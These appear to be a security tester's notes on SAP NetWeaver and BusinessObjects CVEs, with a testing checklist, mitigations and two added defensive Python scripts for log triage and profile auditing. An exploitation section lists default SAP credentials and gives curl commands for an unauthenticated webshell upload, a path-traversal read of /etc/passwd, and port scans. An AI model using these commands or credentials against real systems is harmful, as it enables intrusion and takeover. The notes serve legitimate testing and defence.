Known Vulnerabilities & CVEs - SAP Platform

My notes on SAP CVEs. Some are old but still relevant, especially in on-prem deployments that never get patched.

Critical CVEs (recent ones)

CVE-2025-31324 - Unauthenticated File Upload

  • CVSS Score: 9.8 (Critical)
  • Affected Versions: SAP NetWeaver AS Java Visual Composer
  • Type: Unauthenticated File Upload
  • Impact: Remote Code Execution
  • Description: Unauthenticated file upload in Visual Composer's Metadata Uploader = RCE
  • Exploitation: No auth needed, just upload a malicious file
  • Status: Exploited in the wild! Public exploit available
  • Mitigation: Apply SAP Security Note, disable Visual Composer if not needed

CVE-2025-42999 - Deserialization Vulnerability

  • CVSS Score: 8.8 (High)
  • Affected Versions: SAP NetWeaver AS Java Visual Composer
  • Type: Deserialization
  • Impact: Remote Code Execution
  • Description: Deserialization vuln in Visual Composer = RCE
  • Exploitation: Need authenticated access
  • Mitigation: Apply SAP Security Note, disable Visual Composer if not needed

CVE-2025-0070 - Authentication Bypass

  • CVSS Score: 8.1 (High)
  • Affected Versions: SAP NetWeaver AS for ABAP
  • Type: Improper Authentication
  • Impact: Privilege Escalation
  • Description: Auth bypass in NetWeaver AS for ABAP
  • Exploitation: Need some level of access first
  • Mitigation: Apply SAP Security Note

CVE-2025-0066 - Information Disclosure

  • CVSS Score: 7.5 (High)
  • Affected Versions: SAP NetWeaver AS for ABAP
  • Type: Information Disclosure
  • Impact: Unauthorized Access to Information
  • Description: Info disclosure in NetWeaver AS for ABAP
  • Exploitation: Can leak sensitive system information
  • Mitigation: Apply SAP Security Note

CVE-2024-41730 - Missing Authentication Check

  • CVSS Score: 9.8 (Critical)
  • Affected Versions: SAP BusinessObjects BI Platform
  • Type: Missing Authentication Check
  • Impact: Unauthorized Access
  • Description: Missing auth check in BusinessObjects BI Platform = full system compromise
  • Exploitation: No auth needed, get login token via REST endpoint
  • Mitigation: Apply SAP Security Note

Common vulnerability patterns I've seen

1. Default Credentials

  • admin/admin - Common default
  • sap/sap - Another common default
  • DDIC/19920707 - Development user
  • SAP*/PASS - System user
  • TMSADM/ADMIN - Transport Management System
  • EarlyWatch/SUPPORT - Monitoring user

2. Unpatched Systems

  • Missing Security Notes - SAP releases monthly security patches
  • Legacy Versions - Old, unsupported versions
  • Custom Patches - Modified systems that can't be patched
  • Test Systems - Often left unpatched

3. Misconfigured Services

  • Exposed RFC Interfaces - Should be internal only
  • Weak ICM Configuration - Exposes internal systems
  • Insecure Web Dispatcher - Load balancer misconfigurations
  • Debug Mode Enabled - Development features in production

4. Custom Code Vulnerabilities

  • ABAP Injection - SQL injection in custom ABAP code
  • Authorization Bypass - Custom code doesn't check permissions
  • Input Validation - Missing input validation
  • Business Logic Flaws - Workflow manipulation

5. File Upload Issues

  • Unrestricted File Upload - Can upload any file type
  • Path Traversal - ../../../etc/passwd type stuff
  • Webshell Upload - Upload malicious JSP/ASP files
  • Document Attacks - Malicious PDFs, Office docs

My testing checklist

Before I start

  • Check SAP version and build
  • Map exposed services and ports
  • Look up security advisories for that version
  • Check for known vulnerable components

During testing

  • Test CVE-2025-31324 (unauthenticated file upload)
  • Test CVE-2025-42999 (deserialization)
  • Test CVE-2025-0070 (auth bypass)
  • Test CVE-2025-0066 (info disclosure)
  • Test CVE-2024-41730 (missing auth check)
  • Check for default credentials
  • Test RFC interfaces
  • Check ICM/Web Dispatcher config
  • Test custom code for vulnerabilities

After testing

  • Document findings with CVSS scores
  • Write remediation recommendations
  • Check if SAP Security Notes are available
  • Test if mitigations work

Exploitation Techniques

Default Credentials

# Common default credentials to try
admin:admin
sap:sap
DDIC:19920707
SAP*:PASS
TMSADM:ADMIN
EarlyWatch:SUPPORT

# Test with SAP GUI or web interface

CVE-2025-31324 Exploitation

# Unauthenticated file upload
curl -X POST "https://target-sap.com/sap/bc/ui2/nwbc/visualcomposer/metadata" \
  -F "file=@webshell.jsp" \
  -F "name=webshell.jsp"

# Access uploaded file
curl "https://target-sap.com/sap/bc/ui2/nwbc/visualcomposer/metadata/webshell.jsp"
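
Detection side of the same request pair, as an added example that is not part of the original notes: it scans HTTP access log lines for anonymous POSTs to the upload path used in the commands above and for later fetches of executable files from that path. The log layout, the sample lines and the names triage and severity are assumptions made for this example.

```python
import re
from collections import defaultdict

# Upload path exactly as it appears in the curl commands on this page.
UPLOAD_PATH = "/sap/bc/ui2/nwbc/visualcomposer/metadata"
EXEC_EXT = (".jsp", ".jspx", ".war", ".class")

# Constructed sample lines, Common Log Format-like (assumption: real format may differ).
SAMPLE_LOG = """\
10.0.5.21 - jsmith [12/May/2025:09:14:02 +0000] "GET /sap/bc/ui2/nwbc/ HTTP/1.1" 200 5120
203.0.113.7 - - [12/May/2025:09:15:40 +0000] "POST /sap/bc/ui2/nwbc/visualcomposer/metadata HTTP/1.1" 200 312
203.0.113.7 - - [12/May/2025:09:15:44 +0000] "GET /sap/bc/ui2/nwbc/visualcomposer/metadata/helper.jsp HTTP/1.1" 200 87
198.51.100.9 - - [12/May/2025:10:02:11 +0000] "POST /sap/bc/ui2/nwbc/visualcomposer/metadata HTTP/1.1" 403 0
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

def triage(log_text):
    """Group anonymous uploads and fetches of executable files by client IP."""
    hits = defaultdict(lambda: {"uploads": 0, "accepted": 0, "fetched": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than guess
        path = m["path"].split("?", 1)[0]
        if not path.startswith(UPLOAD_PATH):
            continue
        ok = m["status"].startswith("2")
        if m["method"] == "POST" and m["user"] == "-":
            hits[m["ip"]]["uploads"] += 1
            hits[m["ip"]]["accepted"] += int(ok)
        elif m["method"] == "GET" and ok and path.lower().endswith(EXEC_EXT):
            hits[m["ip"]]["fetched"].append(path)
    return dict(hits)

def severity(hit):
    """critical: accepted upload plus retrieval; high: either one; else attempt."""
    if hit["accepted"] and hit["fetched"]:
        return "critical"
    if hit["accepted"] or hit["fetched"]:
        return "high"
    return "attempt"

if __name__ == "__main__":
    for ip, hit in triage(SAMPLE_LOG).items():
        print(severity(hit), ip, hit)
```

A "critical" result means an anonymous upload was accepted and an executable file was then served from the same path, so the host should be handled as compromised rather than merely probed.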

RFC Interface Testing

# Check for exposed RFC interfaces
nmap -p 3300 target-sap.com

# Test RFC connection (if you have SAP tools)
# Use SAP GUI or custom scripts

ICM/Web Dispatcher Testing

# Check for exposed ICM
nmap -p 8000,44300 target-sap.com

# Test for path traversal
curl "https://target-sap.com/sap/bc/ui2/nwbc/../../../etc/passwd"

# Test for information disclosure
curl "https://target-sap.com/sap/bc/ui2/nwbc/error"

Mitigation Strategies

Immediate Actions

  1. Apply Security Notes - Install latest SAP Security Notes
  2. Change Default Credentials - Change all default passwords
  3. Secure RFC Interfaces - Restrict access to internal networks only
  4. Configure ICM Properly - Don't expose internal systems
  5. Disable Unused Services - Turn off Visual Composer if not needed
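
One way to check items 2 to 4 against an instance profile, as an added example that is not part of the original notes: it parses "name = value" profile lines and reports settings that leave the SAP* default logon, the RFC gateway or a plain HTTP ICM listener open. The sample profile is constructed, and the baseline values and the names parse_profile and audit are assumptions made for this example.

```python
import re

# Constructed sample instance profile (not taken from a real system).
SAMPLE_PROFILE = """\
# instance profile (constructed)
SAPSYSTEMNAME = DEV
login/no_automatic_user_sapstar = 0
gw/acl_mode = 1
gw/sec_info = /usr/sap/DEV/SYS/global/secinfo
icm/server_port_0 = PROT=HTTP,PORT=8000
icm/server_port_1 = PROT=HTTPS,PORT=44300
"""

# Baseline values chosen for this example (assumption, not SAP's official list).
EXPECTED = {
    "login/no_automatic_user_sapstar": ("1", "automatic SAP* logon is possible"),
    "gw/acl_mode": ("1", "gateway is permissive when ACL files are missing"),
}
REQUIRED = {
    "gw/sec_info": "no secinfo ACL for programs started over RFC",
    "gw/reg_info": "no reginfo ACL for programs registering at the gateway",
}

def parse_profile(text):
    """Parse 'name = value' lines; values may themselves contain '='."""
    params = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#") and "=" in line:
            name, value = line.split("=", 1)
            params[name.strip()] = value.strip()
    return params

def audit(text):
    """Return (parameter, found_value, risk) tuples; None means not set in the file."""
    params, issues = parse_profile(text), []
    for name, (want, risk) in EXPECTED.items():
        if params.get(name) != want:
            issues.append((name, params.get(name), risk))
    for name, risk in REQUIRED.items():
        if not params.get(name):
            issues.append((name, None, risk))
    for name, value in params.items():
        if re.fullmatch(r"icm/server_port_\d+", name) and "PROT=HTTP," in value + ",":
            issues.append((name, value, "plain HTTP listener"))
    return issues
```

A parameter missing from the file runs on the kernel default, so a None result calls for checking the effective value on the running system.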

Long-term Security

  1. Regular Patching - Monthly SAP Security Note updates
  2. Security Testing - Regular penetration testing
  3. Configuration Management - Secure configuration baselines
  4. Incident Response - SAP-specific response procedures
